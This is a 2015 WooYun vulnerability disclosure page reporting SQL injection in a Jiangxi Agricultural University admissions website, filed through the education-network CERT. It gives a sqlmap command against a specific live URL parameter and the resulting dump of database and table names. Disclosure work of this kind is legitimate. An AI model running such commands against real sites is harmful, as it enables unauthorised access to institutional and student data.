当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142079

漏洞标题:高校安全之江西农业大学SQL注射

相关厂商:CCERT教育网应急响应组

漏洞作者: 冷白开。

提交时间:2015-09-19 23:03

修复时间:2015-09-24 23:04

公开时间:2015-09-24 23:04

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-19: 细节已通知厂商并且等待厂商处理中
2015-09-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

高校安全之江西农业大学SQL注射

详细说明:

sqlmap.py -u "http://zs.jxau.edu.cn/showpic.php?id=1" --dbs

1.png

available databases [2]:
[*] information_schema
[*] zs_jxau
Database: zs_jxau
[96 tables]
+---------------------------+
| admin_logs |
| admin_logs_failure |
| admin_menu_zs |
| admin_setting_zs |
| admin_usermenu_zs |
| bulletin_files_zs |
| bulletin_images_zs |
| bulletin_pdf |
| clickcount |
| code_bylbdm |
| code_dwlsbmdm |
| code_fee |
| code_jhxzdm |
| code_kldm |
| code_kslbdm |
| code_kslxdm |
| code_mz |
| code_sqdm |
| code_xlccdm |
| code_xzqh |
| code_zswyyzdm |
| code_zy |
| code_zy09 |
| code_zzmm |
| com_city |
| com_province |
| lib_ddzs_kc |
| lib_ddzs_km |
| major_fee |
| major_fee2 |
| message_receive |
| message_receive_zs |
| school_ad_zs |
| school_bulletin_news_pics |
| school_class |
| school_department |
| school_discuss_zs |
| school_flash_zs |
| school_info |
| school_links |
| school_linksdepartment |
| school_linksimage |
| school_linksoffice |
| school_linksother |
| school_lnlqcj |
| school_lqtzs_init |
| school_lqtzs_print |
| school_lqtzsems_init |
| school_lqtzsems_print |
| school_major |
| school_map |
| school_qqchat |
| school_rolemap |
| school_sushe |
| school_sushe_qs |
| school_upfiles_zs |
| school_user |
| school_zs_bkzn |
| school_zs_bxts |
| school_zs_lqxx |
| school_zs_qqchat |
| school_zs_splj |
| school_zs_tszy |
| school_zs_xsrxfc |
| school_zs_yb |
| school_zs_ys |
| school_zs_zsdt |
| school_zs_zsjh |
| school_zs_zszc |
| school_zs_zxgg |
| school_zs_zyjs |
| school_zsjh |
| school_zsjh_dx |
| school_zsjh_major |
| school_zsjh_sw |
| std_base |
| std_base_luqu |
| std_base_luqu_set |
| std_base_skkscj |
| std_base_skkscj_set |
| std_ddzs |
| std_ddzs_department |
| std_ddzs_kmkc |
| std_ddzs_major |
| std_ddzs_set |
| std_ddzs_zykm |
| std_fee2 |
| std_fee_ss |
| std_logfailure |
| std_logsuccess |
| std_netreg |
| std_netreg_set |
| stu_fee |
| sushe_area |
| temp_import_code |
| temp_import_stdcj |
+---------------------------+

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-24 23:04

厂商回复:

最新状态:

暂无